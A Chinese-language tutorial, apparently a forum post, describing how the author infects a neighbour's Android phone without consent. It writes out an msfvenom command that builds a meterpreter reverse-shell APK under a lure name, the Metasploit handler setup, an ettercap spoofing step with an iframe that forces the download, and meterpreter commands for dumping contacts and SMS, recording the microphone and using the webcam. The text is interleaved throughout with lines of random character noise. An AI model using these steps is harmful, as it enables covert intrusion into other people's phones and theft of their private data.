2 J. E% l$ {6 V8 z- h/ N/ i* x
五、msf+ettercap入侵邻居安卓手机
: [$ n4 q, p' [" z" ?/ @3 k' h6 k' q 5 N& J% v7 U9 e5 F
8 D% Q* P4 r3 L; R" E2 }5 r
首先启动msf
" y* ?" A8 E; m' U4 E
: s& h0 \. G& p* z3 s. M& Z3 p7 E+ Z* H6 |0 g8 r( w
先用kali生成一个安卓木马,如下命令:
6 s) m, X1 B& F5 k* s6 @ . L+ v3 K2 J1 i* K) J* ]4 _" A
5 h3 Y: l( `. y* R# c" f" x. `2 U
Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk
, G" B; Z; `! u, O3 m 6 ?; o( T8 F5 ?9 o6 k
. T. g& h& t5 \' {! ]1 [ 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻
% a; u/ G/ h# W6 A' Z0 g+ g
9 d; m# _! e7 d5 C" R! q4 M6 q* X7 O4 o. D! N. q
然后进入msf
1 N: ^0 M0 g' n* X g; h5 @/ W
1 i2 X7 ~& }, K, L& j/ r
5 v. s6 b2 x+ |0 i" U$ ? use exploit/multi/handler
6 N, J) f" d0 z7 \/ s 9 @ I. ^ ^$ B. O& o/ s* u {+ M
! j8 }) ~ D, m! F0 M- R set payload android/meterpreter/reverse_tcp 1 n: ^/ }& R4 L3 i% R ^
) p- `+ z. c+ Q0 [- X3 ^7 T1 H: {0 ?
6 @+ A+ O, D" p; g, G" z d6 ?- [ set LHOST 192.168.0.109 //ip为kaili的ip
$ \5 L* y5 @6 T% U% C, T6 B% U
7 X* M9 J; ~8 P2 x2 P, D% ], q! s/ I
1 d9 L% N$ L+ x0 d! T: E1 S set LPORT 44444 //端口一定要与前面生成的木马的端口一致
i- Q0 ~4 V- a
% E/ d, A9 K6 O' B0 o( y- `6 U+ K5 z& X0 h6 ?# A6 z
Exploit / n4 y' G( ~7 M
# f T6 @: ]1 {5 V6 |8 w+ U9 p# K5 C9 s
C0 ~; z0 w& T - M' O1 t# y" V8 J, h( b( _/ x2 t
6 r1 Z! k J% F7 G N4 |$ Z
下面我们开启ettercap -G
" m) u. T; q! Q % T: g l2 _: T7 p, L( \% k% }; ~* ^
8 c5 M# x3 m- `. V' d1 I 我物理IP为 3 H6 O! `: m3 `$ Q0 m0 a8 @9 q% d
( V( D, G% K5 i7 i2 G0 Y' o
4 N% D p% i' c* J- I . Q( j) P1 c; C1 A! D: y
* I7 b) S, _* ]2 w
f% k4 j# V3 o2 S1 s
别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, ( U/ T5 f, s# {& D* v" l
4 A1 ^. M$ S3 B$ m: d( x$ s
: Q1 Q" J# O2 e k
下面我们来设置一下 + H- _ c/ Y" E" [
* |- ]0 J- M0 i* N. S1 D
' h: |" w& @& e' R" c
. U: E) [% Q+ Q* w7 J* o5 Q6 z2 a 5 j; l1 |& }& _: f- j: N
7 ]3 d1 s; r: U- {( z$ F 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, 0 @( v0 P: Y2 p x
9 J5 u( P3 }9 o5 c
3 F& S1 \3 o6 m! p$ b
' N: ?, w# V8 r$ D; f ! v4 Z& F; c0 J e
; b0 B; x& n5 D4 f/ y8 p, U
! q4 m! D7 @: J* w- \" T7 n
: h: v2 u% [2 t
8 Z8 L. |6 Y8 [0 A Y8 N
3 n; D1 B' z& \0 g9 @5 x$ M
6 O, y( r {9 W
) y! A" r5 e1 I' Y6 s9 L " N+ m, }- Q1 v* m j) [+ z
( _& s3 W1 b) k- v* b3 T) t/ M0 H3 W- y3 ]
/ I6 o+ ^- v X
' m/ V8 `7 b2 P) J4 b- B7 D5 s8 }5 V
' F" {" J# D1 U
& H0 O" ~6 z7 a- n, c& i
* u+ w2 e4 c8 B8 n
( o! \& ?$ [; Q8 s3 E7 { d( d
) |, f m4 W1 F+ S {! r" c: f) b6 o. _/ s8 @8 g7 A2 l# ^ [ A. f
' a, C) C4 o( k" v2 [4 N2 x
# ~ ]& ]. t+ H, e" h/ G
0 _+ H$ {5 n$ L 8 k# \ N8 E: l" ^: G6 I3 e" d
4 y# b q0 ]( l& G/ F" N3 y1 j
) w0 t) g" [6 C$ _" ?2 O
. X4 F* ~- B4 c7 Q# W% v
$ P+ b& s& D8 O5 Z0 J- c0 K- U6 t- i% l( n, Z
) r" y5 n; O1 r; i+ M + z# M: Q% v# z+ ~* s
1 U; @7 ? N( i
4 S' V9 P8 Y, P r 9 `* V* m$ b5 {% e7 H! E1 d
4 ~8 I" \0 G, P5 T; i) L, X
& W& P9 W/ T1 m, E: a# m9 B2 @0 U
; ~) w( @4 t) y5 J, ~6 H' T& T& r A/ w& P: t' _5 [
下面我们开始攻击 " p: B6 \8 ?6 C: `
, n/ _& y+ [+ Y; n9 @+ j4 {" n
c4 x- S4 c+ @ / L7 C# y6 E+ d5 K: @8 z% l
! b' x" K, @+ L) G/ g
4 T* p; [( V. J
* N+ ]% [* h/ N+ n5 L* H4 z0 l ( V' _5 O% W) Z" Z
. \; Q* A% y# B) [2 p8 \
9 L) J6 @' n9 B) x4 e2 _0 i
8 t- k/ D% L+ c
5 S. e: o& x/ Z) X v: [ : x: v$ Q' }; W, e; {5 O# x2 Z
. E' r# z. {6 L$ T3 d" z, r" ]+ R! S0 Z+ C
, o8 r) ~+ P' q/ S0 A+ D6 ~# H 1 D" N% |! e) V! L4 V6 t
+ q7 ~1 c& K/ {3 P3 a0 M
5 l6 P- c7 C5 W! m
大概过了5分钟多,发现反弹成功了
; S3 J6 F* H) m& d8 J: o2 r& D
7 `2 ?3 ^$ K" }' Z! ~/ P2 H5 O
3 G3 h, E* f: N 2 t4 R3 \3 Y9 I8 B
4 v7 A' E ]5 E- \$ N+ q; y
/ u% f1 {5 ?; s) i: t
6 ?; r5 Q2 V$ {0 c f ' j/ G4 @5 s5 j, f7 w) n3 u; R
; @# [8 R$ S/ Z
' ~8 u" J3 O3 V: ~+ u6 j' C' ?: Y5 ^
. F4 T ~, ^" Q7 {' ]- X7 M! t- n8 N# \/ p! h4 `- F
: Z0 F5 n! n. U2 E4 a4 E- M5 S8 v
- `6 z. M+ \; |" f! F
5 I+ a3 u3 m; t* z1 z, M
/ m) P( X% k( V! t4 q% D! X% o % P7 P% q! I8 f, G$ W$ i! {
' o" S! b0 t# X+ G
- I+ o) v/ b& _) r% W 1 p' I6 Y2 K A4 {
" P Q/ B7 \" r" A$ P
- I" @: G& q0 E) S
+ m4 x- C: `& G( p+ R6 q9 Z
6 f! r* O$ S6 ^3 u. W7 f! u( B5 F 执行命令
. J3 T' D! w9 |# ? $ v: l9 t( G9 O# K) x& _8 l" B2 q: _
" e1 w9 P1 E) k# M _
5 C7 p" O4 {* \ ; g( y6 x) j* u, c. {
6 f6 P9 P- D0 n% E }2 g5 U+ k5 k3 Q; O
dump_contacts --》这个是导出电话 % e) P. _2 z, e) D, u# E" ^
- V$ h- `* V+ W3 ~9 O& f/ ^" k
; I9 Y9 I- ?* ]8 }" T' P dump_sms --》这个是导出信息
) Y( t) C7 @7 F. n$ n9 J
( w2 D& U: A/ [
/ B; Q. H4 t* j, {" o# p record_mic Record audio from the default microphone for X seconds
_0 g% H2 c7 `/ h& n. X+ ^. J: s! ^ 0 {1 ^3 ~) R1 K, }2 ` M' f- {
" d& l% }# B/ @4 o. P% j9 ` webcam_chat Start a video chat # [3 E2 ]+ M8 g( r, {) [. T+ J
6 r7 I4 |- c6 q3 U9 U# ?0 W- S# x
2 R( t) e$ P. W- a% e2 ^; @ webcam_list List webcams , s7 K3 S: C* `) b
( u6 u, |$ L, G! m
, \) k: @* p7 W webcam_snap Take a snapshot from the specified webcam $ I2 I6 \( I3 q
: Z8 ^& m( @6 o! O. r' x& i( L- |
" b5 v6 h& O5 i# V) H
webcam_stream   lay a video stream from the specified webcam
' Z, I+ ?' M0 n
$ t& C7 j/ k7 [2 F
" ]3 V# D$ T$ t/ r; M, n
) h& x2 g3 v ]- z& g5 N
( P! J/ g! }# B! F% L4 e- `' Q: D- |
: ]3 J% c5 e1 V) N
- w3 q* D8 @& v. x
& h \/ y( {( [; A6 |! j 我们打开看一下电话薄, 8 ?; G7 |! j: h5 U
% K# g2 Y: G1 j% p. q
( N8 D# _3 G/ G
0 P2 C. c7 j8 u: ~& F. L
* L1 K- P* `# N* j7 ~+ Y* W
3 j' q* n7 X. ~! q3 C 1 |6 b+ }7 q9 C. s; I& J
0 v9 L: f$ f% ^6 O3 O% b: W: [6 x3 ]" p) |" Y
6 @/ k0 H5 s. [: ^; }
: u8 ?8 B( o. N; u2 S* O* O" e4 Y; M& Z' [: E- D( ~. Y( R# S. j
: b" R* y# k/ n; \
) K ]7 q+ d3 t9 D, z
' Z0 [+ u! Q* Z( E* m
) ^1 V5 P1 E5 b% s9 s. b: v
6 m2 `7 \+ U' b+ Q2 ^# L' f5 ?' j- E( b1 V6 E3 ]
* d1 a2 S7 n7 Y4 n: E & C" F3 m$ `% {8 ?+ n( a
0 B3 ~% ?, X- Q7 |8 U
我们同时欺骗成DroidJack木马,使用方法如图: 1 S' w, B) A, Q9 Z. O
" A. y) B r1 f& s4 t5 R2 t6 m
: [0 ?- b) D: q( W + \' I" k B7 R4 G% d
8 D# v0 V: Z4 U- U% h4 Z: Y. I" T+ B1 j. p0 b2 M+ A3 `! h H( @8 F
) p1 G0 L* K* f0 ^% G! T' J ; h4 ^1 w( P7 ]1 n7 ~9 r
$ X# f" Q+ S" o- m( E( ^# j Z4 ?7 h# |$ x! A$ l
5 D/ i1 R" n/ z* E* z" F1 p
1 H: F, P3 g$ E* N
切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 : ~3 O& t; l# ^, x5 j
, P k) }7 T, b# _6 n0 X z* S
' v) h7 |! t5 ^: c+ P
9 n9 _! K9 v( n2 }! m
2 R' b' [9 _$ ?1 [3 I: }5 l$ ~3 N' t+ u) [% l" @4 K4 W
+ p5 N6 @% r9 e1 S
. u- w A3 Q F _$ Q2 r) g4 w; `6 ~6 c8 x# _8 c! Z
) J/ G$ Z! H1 P$ a6 ]
" o- S* {2 x) d% i& @; |1 ] a
- m4 Z; v" V- s' f$ [- @( i 
$ c& Y% |5 ?6 ~
4 i+ e8 m) q# s. C7 u) E$ V7 y' L3 H
* C0 G1 K% [) p6 v) T. f( _
|